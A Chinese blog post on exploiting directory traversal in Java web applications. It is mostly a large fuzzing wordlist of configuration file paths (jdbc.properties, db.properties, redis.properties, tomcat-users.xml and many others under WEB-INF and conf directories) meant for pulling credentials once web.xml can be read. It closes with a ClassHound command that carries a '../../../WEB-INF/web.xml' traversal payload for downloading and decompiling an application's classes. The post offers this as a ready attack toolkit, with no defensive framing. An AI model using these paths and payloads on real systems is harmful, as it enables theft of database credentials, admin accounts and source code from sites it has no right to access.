目录穿越读取WEB-INF/web.xml后续fuzz，jdbc字典

低调求绕过,没事写博客

已于 2024-02-29 08:15:23 修改

阅读量139

点赞数 2

文章标签： java 前端开发语言

于 2024-02-25 20:32:03 首次发布

本文链接：https://blog.csdn.net/qq_35013491/article/details/136286806

版权

文章探讨了如何在读取WEB-INF/web.xml时，通过Fuzz测试组合路径来获取更多信息，还提到了使用工具ClassHound进行任意文件下载漏洞检测和Java源代码反编译的方法。

摘要由CSDN通过智能技术生成

能读取WEB-INF/web.xml的时候想要读取更多信息的时候，可以尝试以下路径组合代码中的路径进行fuzz测试。

/WEB-INF/classes/config/

/WEB-INF/classes/

/WEB-INF/

/WEB-INF/config/

/config/

/conf/

/application.properties
/application.properties
/application.yml
/application-bean.xml
/applicationContext.xml
/application-dev.properties
/application-pro.properties
/application-test.properties
/base.properties
/beans.xml
/config-application.properties
/config-applicationContext.xml
/config-application-dev.properties
/config-application-pro.properties
/config-base.properties
/config-configuration.xml
/config-context.xml
/config-custom.properties
/config-database.properties
/config-database.xml
/config-db.properties
/config-dev.properties
/config-hibernate.cfg.xml
/config-init.properties
/config-iportal.xml
/config-jdbc.properties
/config-jndi.properties
/config-latke.properties
/config-log4j.properties
/config-parameter.properties
/config-persistence.xml
/config-pro.properties
/config-server.xml
/config-servicecloud.base.properties
/config-shiro.properties
/config-shiro.xml
/config-siteadmin.xml
/config-struts.xml
/config-sun-web.xml
/config-tomcat-users.xml
/configuration.xml
/config-weaver.properties
/config-web.xml
/config-weblogic.xml
/context.xml
/custom.properties
/database.properties
/database.xml
/db.properties
/deploy.sh
/dev.properties
/hibernate.cfg.xml
/init.properties
/iportal.xml
/jdbc.properties
/jndi.properties
/latke.properties
/log4j.properties
/parameter.properties
/persistence.xml
/pro.properties
/redis.properties
/server.xml
/servicecloud.base.properties
/shiro.properties
/shiro.xml
/siteadmin.xml
/Springmvc-servlet.xml
/struts.xml
/sun-web.xml
/sys.properties
/tomcat-users.xml
/weaver.properties
/web.xml
/weblogic.xml

完整组合jdbc字典：

/application.properties
/application.yml
/application-bean.xml
/applicationContext.xml
/application-dev.properties
/application-pro.properties
/application-test.properties
/base.properties
/beans.xml
/conf/application.properties
/conf/application.yml
/conf/application-bean.xml
/conf/applicationContext.xml
/conf/application-dev.properties
/conf/application-pro.properties
/conf/application-test.properties
/conf/base.properties
/conf/beans.xml
/conf/config-application.properties
/conf/config-applicationContext.xml
/conf/config-application-dev.properties
/conf/config-application-pro.properties
/conf/config-base.properties
/conf/config-configuration.xml
/conf/config-context.xml
/conf/config-custom.properties
/conf/config-database.properties
/conf/config-database.xml
/conf/config-db.properties
/conf/config-dev.properties
/conf/config-hibernate.cfg.xml
/conf/config-init.properties
/conf/config-iportal.xml
/conf/config-jdbc.properties
/conf/config-jndi.properties
/conf/config-latke.properties
/conf/config-log4j.properties
/conf/config-parameter.properties
/conf/config-persistence.xml
/conf/config-pro.properties
/conf/config-server.xml
/conf/config-servicecloud.base.properties
/conf/config-shiro.properties
/conf/config-shiro.xml
/conf/config-siteadmin.xml
/conf/config-struts.xml
/conf/config-sun-web.xml
/conf/config-tomcat-users.xml
/conf/configuration.xml
/conf/config-weaver.properties
/conf/config-web.xml
/conf/config-weblogic.xml
/conf/context.xml
/conf/custom.properties
/conf/database.properties
/conf/database.xml
/conf/db.properties
/conf/deploy.sh
/conf/dev.properties
/conf/hibernate.cfg.xml
/conf/init.properties
/conf/iportal.xml
/conf/jdbc.properties
/conf/jndi.properties
/conf/latke.properties
/conf/log4j.properties
/conf/parameter.properties
/conf/persistence.xml
/conf/pro.properties
/conf/redis.properties
/conf/server.xml
/conf/servicecloud.base.properties
/conf/shiro.properties
/conf/shiro.xml
/conf/siteadmin.xml
/conf/Springmvc-servlet.xml
/conf/struts.xml
/conf/sun-web.xml
/conf/sys.properties
/conf/tomcat-users.xml
/conf/weaver.properties
/conf/web.xml
/conf/weblogic.xml
/config/application.properties
/config/application.yml
/config/application-bean.xml
/config/applicationContext.xml
/config/application-dev.properties
/config/application-pro.properties
/config/application-test.properties
/config/base.properties
/config/beans.xml
/config/config-application.properties
/config/config-applicationContext.xml
/config/config-application-dev.properties
/config/config-application-pro.properties
/config/config-base.properties
/config/config-configuration.xml
/config/config-context.xml
/config/config-custom.properties
/config/config-database.properties
/config/config-database.xml
/config/config-db.properties
/config/config-dev.properties
/config/config-hibernate.cfg.xml
/config/config-init.properties
/config/config-iportal.xml
/config/config-jdbc.properties
/config/config-jndi.properties
/config/config-latke.properties
/config/config-log4j.properties
/config/config-parameter.properties
/config/config-persistence.xml
/config/config-pro.properties
/config/config-server.xml
/config/config-servicecloud.base.properties
/config/config-shiro.properties
/config/config-shiro.xml
/config/config-siteadmin.xml
/config/config-struts.xml
/config/config-sun-web.xml
/config/config-tomcat-users.xml
/config/configuration.xml
/config/config-weaver.properties
/config/config-web.xml
/config/config-weblogic.xml
/config/context.xml
/config/custom.properties
/config/database.properties
/config/database.xml
/config/db.properties
/config/deploy.sh
/config/dev.properties
/config/hibernate.cfg.xml
/config/init.properties
/config/iportal.xml
/config/jdbc.properties
/config/jndi.properties
/config/latke.properties
/config/log4j.properties
/config/parameter.properties
/config/persistence.xml
/config/pro.properties
/config/redis.properties
/config/server.xml
/config/servicecloud.base.properties
/config/shiro.properties
/config/shiro.xml
/config/siteadmin.xml
/config/Springmvc-servlet.xml
/config/struts.xml
/config/sun-web.xml
/config/sys.properties
/config/tomcat-users.xml
/config/weaver.properties
/config/web.xml
/config/weblogic.xml
/config-application.properties
/config-applicationContext.xml
/config-application-dev.properties
/config-application-pro.properties
/config-base.properties
/config-configuration.xml
/config-context.xml
/config-custom.properties
/config-database.properties
/config-database.xml
/config-db.properties
/config-dev.properties
/config-hibernate.cfg.xml
/config-init.properties
/config-iportal.xml
/config-jdbc.properties
/config-jndi.properties
/config-latke.properties
/config-log4j.properties
/config-parameter.properties
/config-persistence.xml
/config-pro.properties
/config-server.xml
/config-servicecloud.base.properties
/config-shiro.properties
/config-shiro.xml
/config-siteadmin.xml
/config-struts.xml
/config-sun-web.xml
/config-tomcat-users.xml
/configuration.xml
/config-weaver.properties
/config-web.xml
/config-weblogic.xml
/context.xml
/custom.properties
/database.properties
/database.xml
/db.properties
/deploy.sh
/dev.properties
/hibernate.cfg.xml
/init.properties
/iportal.xml
/jdbc.properties
/jndi.properties
/latke.properties
/log4j.properties
/parameter.properties
/persistence.xml
/pro.properties
/redis.properties
/server.xml
/servicecloud.base.properties
/shiro.properties
/shiro.xml
/siteadmin.xml
/Springmvc-servlet.xml
/struts.xml
/sun-web.xml
/sys.properties
/tomcat-users.xml
/weaver.properties
/web.xml
/WEB-INF/application.properties
/WEB-INF/application.yml
/WEB-INF/application-bean.xml
/WEB-INF/applicationContext.xml
/WEB-INF/application-dev.properties
/WEB-INF/application-pro.properties
/WEB-INF/application-test.properties
/WEB-INF/base.properties
/WEB-INF/beans.xml
/WEB-INF/config-application.properties
/WEB-INF/config-applicationContext.xml
/WEB-INF/config-application-dev.properties
/WEB-INF/config-application-pro.properties
/WEB-INF/config-base.properties
/WEB-INF/config-configuration.xml
/WEB-INF/config-context.xml
/WEB-INF/config-custom.properties
/WEB-INF/config-database.properties
/WEB-INF/config-database.xml
/WEB-INF/config-db.properties
/WEB-INF/config-dev.properties
/WEB-INF/config-hibernate.cfg.xml
/WEB-INF/config-init.properties
/WEB-INF/config-iportal.xml
/WEB-INF/config-jdbc.properties
/WEB-INF/config-jndi.properties
/WEB-INF/config-latke.properties
/WEB-INF/config-log4j.properties
/WEB-INF/config-parameter.properties
/WEB-INF/config-persistence.xml
/WEB-INF/config-pro.properties
/WEB-INF/config-server.xml
/WEB-INF/config-servicecloud.base.properties
/WEB-INF/config-shiro.properties
/WEB-INF/config-shiro.xml
/WEB-INF/config-siteadmin.xml
/WEB-INF/config-struts.xml
/WEB-INF/config-sun-web.xml
/WEB-INF/config-tomcat-users.xml
/WEB-INF/configuration.xml
/WEB-INF/config-weaver.properties
/WEB-INF/config-web.xml
/WEB-INF/config-weblogic.xml
/WEB-INF/context.xml
/WEB-INF/custom.properties
/WEB-INF/database.properties
/WEB-INF/database.xml
/WEB-INF/db.properties
/WEB-INF/deploy.sh
/WEB-INF/dev.properties
/WEB-INF/hibernate.cfg.xml
/WEB-INF/init.properties
/WEB-INF/iportal.xml
/WEB-INF/jdbc.properties
/WEB-INF/jndi.properties
/WEB-INF/latke.properties
/WEB-INF/log4j.properties
/WEB-INF/parameter.properties
/WEB-INF/persistence.xml
/WEB-INF/pro.properties
/WEB-INF/redis.properties
/WEB-INF/server.xml
/WEB-INF/servicecloud.base.properties
/WEB-INF/shiro.properties
/WEB-INF/shiro.xml
/WEB-INF/siteadmin.xml
/WEB-INF/Springmvc-servlet.xml
/WEB-INF/struts.xml
/WEB-INF/sun-web.xml
/WEB-INF/sys.properties
/WEB-INF/tomcat-users.xml
/WEB-INF/weaver.properties
/WEB-INF/web.xml
/WEB-INF/weblogic.xml
/WEB-INF/classes/application.properties
/WEB-INF/classes/application.yml
/WEB-INF/classes/application-bean.xml
/WEB-INF/classes/applicationContext.xml
/WEB-INF/classes/application-dev.properties
/WEB-INF/classes/application-pro.properties
/WEB-INF/classes/application-test.properties
/WEB-INF/classes/base.properties
/WEB-INF/classes/beans.xml
/WEB-INF/classes/config-application.properties
/WEB-INF/classes/config-applicationContext.xml
/WEB-INF/classes/config-application-dev.properties
/WEB-INF/classes/config-application-pro.properties
/WEB-INF/classes/config-base.properties
/WEB-INF/classes/config-configuration.xml
/WEB-INF/classes/config-context.xml
/WEB-INF/classes/config-custom.properties
/WEB-INF/classes/config-database.properties
/WEB-INF/classes/config-database.xml
/WEB-INF/classes/config-db.properties
/WEB-INF/classes/config-dev.properties
/WEB-INF/classes/config-hibernate.cfg.xml
/WEB-INF/classes/config-init.properties
/WEB-INF/classes/config-iportal.xml
/WEB-INF/classes/config-jdbc.properties
/WEB-INF/classes/config-jndi.properties
/WEB-INF/classes/config-latke.properties
/WEB-INF/classes/config-log4j.properties
/WEB-INF/classes/config-parameter.properties
/WEB-INF/classes/config-persistence.xml
/WEB-INF/classes/config-pro.properties
/WEB-INF/classes/config-server.xml
/WEB-INF/classes/config-servicecloud.base.properties
/WEB-INF/classes/config-shiro.properties
/WEB-INF/classes/config-shiro.xml
/WEB-INF/classes/config-siteadmin.xml
/WEB-INF/classes/config-struts.xml
/WEB-INF/classes/config-sun-web.xml
/WEB-INF/classes/config-tomcat-users.xml
/WEB-INF/classes/configuration.xml
/WEB-INF/classes/config-weaver.properties
/WEB-INF/classes/config-web.xml
/WEB-INF/classes/config-weblogic.xml
/WEB-INF/classes/context.xml
/WEB-INF/classes/custom.properties
/WEB-INF/classes/database.properties
/WEB-INF/classes/database.xml
/WEB-INF/classes/db.properties
/WEB-INF/classes/deploy.sh
/WEB-INF/classes/dev.properties
/WEB-INF/classes/hibernate.cfg.xml
/WEB-INF/classes/init.properties
/WEB-INF/classes/iportal.xml
/WEB-INF/classes/jdbc.properties
/WEB-INF/classes/jndi.properties
/WEB-INF/classes/latke.properties
/WEB-INF/classes/log4j.properties
/WEB-INF/classes/parameter.properties
/WEB-INF/classes/persistence.xml
/WEB-INF/classes/pro.properties
/WEB-INF/classes/redis.properties
/WEB-INF/classes/server.xml
/WEB-INF/classes/servicecloud.base.properties
/WEB-INF/classes/shiro.properties
/WEB-INF/classes/shiro.xml
/WEB-INF/classes/siteadmin.xml
/WEB-INF/classes/Springmvc-servlet.xml
/WEB-INF/classes/struts.xml
/WEB-INF/classes/sun-web.xml
/WEB-INF/classes/sys.properties
/WEB-INF/classes/tomcat-users.xml
/WEB-INF/classes/weaver.properties
/WEB-INF/classes/web.xml
/WEB-INF/classes/weblogic.xml
/WEB-INF/classes/config/application.properties
/WEB-INF/classes/config/application.yml
/WEB-INF/classes/config/application-bean.xml
/WEB-INF/classes/config/applicationContext.xml
/WEB-INF/classes/config/application-dev.properties
/WEB-INF/classes/config/application-pro.properties
/WEB-INF/classes/config/application-test.properties
/WEB-INF/classes/config/base.properties
/WEB-INF/classes/config/beans.xml
/WEB-INF/classes/config/config-application.properties
/WEB-INF/classes/config/config-applicationContext.xml
/WEB-INF/classes/config/config-application-dev.properties
/WEB-INF/classes/config/config-application-pro.properties
/WEB-INF/classes/config/config-base.properties
/WEB-INF/classes/config/config-configuration.xml
/WEB-INF/classes/config/config-context.xml
/WEB-INF/classes/config/config-custom.properties
/WEB-INF/classes/config/config-database.properties
/WEB-INF/classes/config/config-database.xml
/WEB-INF/classes/config/config-db.properties
/WEB-INF/classes/config/config-dev.properties
/WEB-INF/classes/config/config-hibernate.cfg.xml
/WEB-INF/classes/config/config-init.properties
/WEB-INF/classes/config/config-iportal.xml
/WEB-INF/classes/config/config-jdbc.properties
/WEB-INF/classes/config/config-jndi.properties
/WEB-INF/classes/config/config-latke.properties
/WEB-INF/classes/config/config-log4j.properties
/WEB-INF/classes/config/config-parameter.properties
/WEB-INF/classes/config/config-persistence.xml
/WEB-INF/classes/config/config-pro.properties
/WEB-INF/classes/config/config-server.xml
/WEB-INF/classes/config/config-servicecloud.base.properties
/WEB-INF/classes/config/config-shiro.properties
/WEB-INF/classes/config/config-shiro.xml
/WEB-INF/classes/config/config-siteadmin.xml
/WEB-INF/classes/config/config-struts.xml
/WEB-INF/classes/config/config-sun-web.xml
/WEB-INF/classes/config/config-tomcat-users.xml
/WEB-INF/classes/config/configuration.xml
/WEB-INF/classes/config/config-weaver.properties
/WEB-INF/classes/config/config-web.xml
/WEB-INF/classes/config/config-weblogic.xml
/WEB-INF/classes/config/context.xml
/WEB-INF/classes/config/custom.properties
/WEB-INF/classes/config/database.properties
/WEB-INF/classes/config/database.xml
/WEB-INF/classes/config/db.properties
/WEB-INF/classes/config/deploy.sh
/WEB-INF/classes/config/dev.properties
/WEB-INF/classes/config/hibernate.cfg.xml
/WEB-INF/classes/config/init.properties
/WEB-INF/classes/config/iportal.xml
/WEB-INF/classes/config/jdbc.properties
/WEB-INF/classes/config/jndi.properties
/WEB-INF/classes/config/latke.properties
/WEB-INF/classes/config/log4j.properties
/WEB-INF/classes/config/parameter.properties
/WEB-INF/classes/config/persistence.xml
/WEB-INF/classes/config/pro.properties
/WEB-INF/classes/config/redis.properties
/WEB-INF/classes/config/server.xml
/WEB-INF/classes/config/servicecloud.base.properties
/WEB-INF/classes/config/shiro.properties
/WEB-INF/classes/config/shiro.xml
/WEB-INF/classes/config/siteadmin.xml
/WEB-INF/classes/config/Springmvc-servlet.xml
/WEB-INF/classes/config/struts.xml
/WEB-INF/classes/config/sun-web.xml
/WEB-INF/classes/config/sys.properties
/WEB-INF/classes/config/tomcat-users.xml
/WEB-INF/classes/config/weaver.properties
/WEB-INF/classes/config/web.xml
/WEB-INF/classes/config/weblogic.xml
/WEB-INF/config/application.properties
/WEB-INF/config/application.yml
/WEB-INF/config/application-bean.xml
/WEB-INF/config/applicationContext.xml
/WEB-INF/config/application-dev.properties
/WEB-INF/config/application-pro.properties
/WEB-INF/config/application-test.properties
/WEB-INF/config/base.properties
/WEB-INF/config/beans.xml
/WEB-INF/config/config-application.properties
/WEB-INF/config/config-applicationContext.xml
/WEB-INF/config/config-application-dev.properties
/WEB-INF/config/config-application-pro.properties
/WEB-INF/config/config-base.properties
/WEB-INF/config/config-configuration.xml
/WEB-INF/config/config-context.xml
/WEB-INF/config/config-custom.properties
/WEB-INF/config/config-database.properties
/WEB-INF/config/config-database.xml
/WEB-INF/config/config-db.properties
/WEB-INF/config/config-dev.properties
/WEB-INF/config/config-hibernate.cfg.xml
/WEB-INF/config/config-init.properties
/WEB-INF/config/config-iportal.xml
/WEB-INF/config/config-jdbc.properties
/WEB-INF/config/config-jndi.properties
/WEB-INF/config/config-latke.properties
/WEB-INF/config/config-log4j.properties
/WEB-INF/config/config-parameter.properties
/WEB-INF/config/config-persistence.xml
/WEB-INF/config/config-pro.properties
/WEB-INF/config/config-server.xml
/WEB-INF/config/config-servicecloud.base.properties
/WEB-INF/config/config-shiro.properties
/WEB-INF/config/config-shiro.xml
/WEB-INF/config/config-siteadmin.xml
/WEB-INF/config/config-struts.xml
/WEB-INF/config/config-sun-web.xml
/WEB-INF/config/config-tomcat-users.xml
/WEB-INF/config/configuration.xml
/WEB-INF/config/config-weaver.properties
/WEB-INF/config/config-web.xml
/WEB-INF/config/config-weblogic.xml
/WEB-INF/config/context.xml
/WEB-INF/config/custom.properties
/WEB-INF/config/database.properties
/WEB-INF/config/database.xml
/WEB-INF/config/db.properties
/WEB-INF/config/deploy.sh
/WEB-INF/config/dev.properties
/WEB-INF/config/hibernate.cfg.xml
/WEB-INF/config/init.properties
/WEB-INF/config/iportal.xml
/WEB-INF/config/jdbc.properties
/WEB-INF/config/jndi.properties
/WEB-INF/config/latke.properties
/WEB-INF/config/log4j.properties
/WEB-INF/config/parameter.properties
/WEB-INF/config/persistence.xml
/WEB-INF/config/pro.properties
/WEB-INF/config/redis.properties
/WEB-INF/config/server.xml
/WEB-INF/config/servicecloud.base.properties
/WEB-INF/config/shiro.properties
/WEB-INF/config/shiro.xml
/WEB-INF/config/siteadmin.xml
/WEB-INF/config/Springmvc-servlet.xml
/WEB-INF/config/struts.xml
/WEB-INF/config/sun-web.xml
/WEB-INF/config/sys.properties
/WEB-INF/config/tomcat-users.xml
/WEB-INF/config/weaver.properties
/WEB-INF/config/web.xml
/WEB-INF/config/weblogic.xml
/weblogic.xml

当然还可以尝试利用工具读取WEB-INF/web.xml泄露的class文件，有时候读不到很可能是路径不对，可以多次进行尝试：

工具名称：WEB-INF-Class-Fuzz-master

GitHub - LandGrey/ClassHound: 利用任意文件下载漏洞循环下载反编译 Class 文件获得网站 Java 源代码

用法：python38 classhound.py -u "http://127.0.0.1/download.jsp?path=#../../../WEB-INF/web.xml#"

#../../../WEB-INF/web.xml#